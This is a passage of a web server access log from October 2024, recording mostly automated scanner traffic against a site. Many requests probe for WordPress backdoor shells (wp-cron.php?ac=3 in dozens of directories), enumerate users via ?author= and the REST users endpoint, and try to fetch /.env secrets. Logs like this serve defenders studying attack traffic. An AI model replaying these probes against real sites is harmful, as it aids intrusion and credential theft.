AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:11:44 +0700] "GET /site/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:11:46 +0700] "GET /js/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:11:47 +0700] "GET /wp-includes/js/tinymce/plugins/compat3x/css/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:11:49 +0700] "GET /wp-includes/js/tinymce/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:11:50 +0700] "GET /wp-includes/Text/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:11:52 +0700] "GET /wp-includes/rest-api/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:11:54 +0700] "GET /wp-includes/js/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:11:55 +0700] "GET /wp-includes/js/tinymce/plugins/compat3x/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:11:57 +0700] "GET /wp-content/plugins/Cache/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:11:58 +0700] "GET /css/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:12:00 +0700] "GET /cgi-bin/cgi-bin/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:12:02 +0700] "GET /cgi-bin/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:12:03 +0700] "GET /.wp-cli/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:12:16 +0700] "GET /.well-known/pki-validationwp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:12:31 +0700] "GET /wp-admin/css/colors/coffee/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:12:33 +0700] "GET /wp-content/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:12:34 +0700] "GET /wp-admin/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:12:35 +0700] "GET /wp-includes/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:12:37 +0700] "GET /wp-content/upgrade/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:12:38 +0700] "GET /wp-content/dir/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:12:40 +0700] "GET /wp-content/fonts/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:12:42 +0700] "GET /wp-content/languages/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:12:44 +0700] "GET /wp-content/plugins/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:12:46 +0700] "GET /wp-content/themes/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:12:47 +0700] "GET /wp-content/upgrade/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:12:49 +0700] "GET /wp-includes/ID3/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 5.62.34.21 - - [09/Oct/2024:18:12:51 +0700] "GET /wp-content/css/wp-cron.php?ac=3 HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 45.10.151.10 - - [10/Oct/2024:00:58:53 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 45.10.151.10 - - [10/Oct/2024:00:58:58 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 45.10.151.10 - - [10/Oct/2024:00:59:01 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 34.162.237.140 - - [10/Oct/2024:04:37:19 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 157.245.149.177 - - [10/Oct/2024:20:07:32 +0700] "GET /wp-content/plugins/elementor/readme.txt HTTP/1.1" 301 162 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" 165.227.38.93 - - [11/Oct/2024:21:36:00 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 87.120.115.144 - - [12/Oct/2024:00:51:18 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 159.203.92.188 - - [12/Oct/2024:04:40:20 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" 162.142.125.222 - - [12/Oct/2024:05:24:24 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 35.226.145.6 - - [14/Oct/2024:07:33:03 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 87.120.117.240 - - [14/Oct/2024:10:02:34 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 103.57.223.227 - - [14/Oct/2024:19:52:44 +0700] "GET /wp-json/wp/v2/users HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" 91.179.244.76 - - [15/Oct/2024:09:29:12 +0700] "GET /?author=11 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1" 128.199.182.156 - - [15/Oct/2024:09:29:15 +0700] "GET /?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36" 103.190.27.124 - - [15/Oct/2024:09:29:23 +0700] "GET /?author=31 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" 88.99.106.172 - - [15/Oct/2024:09:29:32 +0700] "GET /?author=11 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0" 178.160.201.18 - - [15/Oct/2024:09:29:59 +0700] "GET /?author=31 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 178.33.43.96 - - [15/Oct/2024:09:30:02 +0700] "GET /?author=21 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 103.77.162.13 - - [15/Oct/2024:09:30:33 +0700] "GET /?author=41 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1" 157.230.99.15 - - [16/Oct/2024:19:07:37 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 31.24.44.159 - - [17/Oct/2024:06:46:26 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 31.24.44.159 - - [17/Oct/2024:06:46:29 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 31.24.44.159 - - [17/Oct/2024:06:46:33 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 167.86.98.69 - - [19/Oct/2024:20:21:04 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 67.205.45.176 - - [19/Oct/2024:21:00:42 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 91.134.248.192 - - [19/Oct/2024:21:14:36 +0700] "GET /wp-json/wp/v2/users HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0" 84.205.244.139 - - [19/Oct/2024:21:35:50 +0700] "GET /wp-login.php HTTP/1.0" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 218.94.82.254 - - [20/Oct/2024:02:12:32 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" 35.171.144.152 - - [20/Oct/2024:21:08:43 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 \x5C(Windows NT 10.0\x5C; Win64\x5C; x64\x5C) AppleWebKit/537.36 \x5C(KHTML, like Gecko\x5C) Chrome/100.0.4896.60 Safari/537.36" 144.91.106.14 - - [22/Oct/2024:02:13:15 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36" 87.236.176.221 - - [22/Oct/2024:13:07:23 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" 34.82.140.208 - - [22/Oct/2024:19:15:33 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 34.170.233.133 - - [23/Oct/2024:18:19:09 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 94.141.120.17 - - [24/Oct/2024:02:38:01 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 94.141.120.17 - - [24/Oct/2024:02:38:02 +0700] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 94.141.120.17 - - [24/Oct/2024:02:38:02 +0700] "POST / HTTP/1.1" 301 162 "-" "python-requests/2.31.0" 94.141.120.17 - - [24/Oct/2024:02:38:02 +0700] "GET /?%3Cplay%3Ewithme%3C/%3E HTTP/1.1" 301 162 "-" "python-requests/2.31.0" 94.141.120.17 - - [24/Oct/2024:02:38:03 +0700] "POST / HTTP/1.1" 301 162 "-" "python-requests/2.31.0" 34.138.250.116 - - [24/Oct/2024:05:42:32 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 157.230.35.45 - - [24/Oct/2024:10:08:59 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" 49.51.194.75 - - [24/Oct/2024:14:18:27 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 49.51.194.75 - - [24/Oct/2024:14:18:38 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 49.51.194.75 - - [24/Oct/2024:14:18:44 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 66.249.71.199 - - [25/Oct/2024:04:25:38 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.71.197 - - [25/Oct/2024:04:25:39 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 24.199.103.134 - - [25/Oct/2024:14:50:58 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 51.159.30.40 - - [26/Oct/2024:10:09:48 +0700] "GET /wp-includes/js/jcrop/Jcrop.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 51.159.30.40 - - [26/Oct/2024:10:10:09 +0700] "GET /wp-content/plugins/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 51.159.30.40 - - [26/Oct/2024:10:10:21 +0700] "GET /wp-admin/images/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 51.159.30.40 - - [26/Oct/2024:10:10:48 +0700] "GET /index/function.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 51.159.30.40 - - [26/Oct/2024:10:10:53 +0700] "GET /wp-admin/network/index.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 51.159.30.40 - - [26/Oct/2024:10:11:01 +0700] "GET /wp-includes/fonts/about.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 198.235.24.60 - - [26/Oct/2024:13:00:16 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 34.100.237.198 - - [27/Oct/2024:16:13:46 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 167.94.146.61 - - [28/Oct/2024:09:25:41 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 219.129.252.31 - - [29/Oct/2024:06:46:00 +0700] "GET /wp-json/wp/v2/users HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36" 35.202.177.219 - - [29/Oct/2024:14:45:42 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"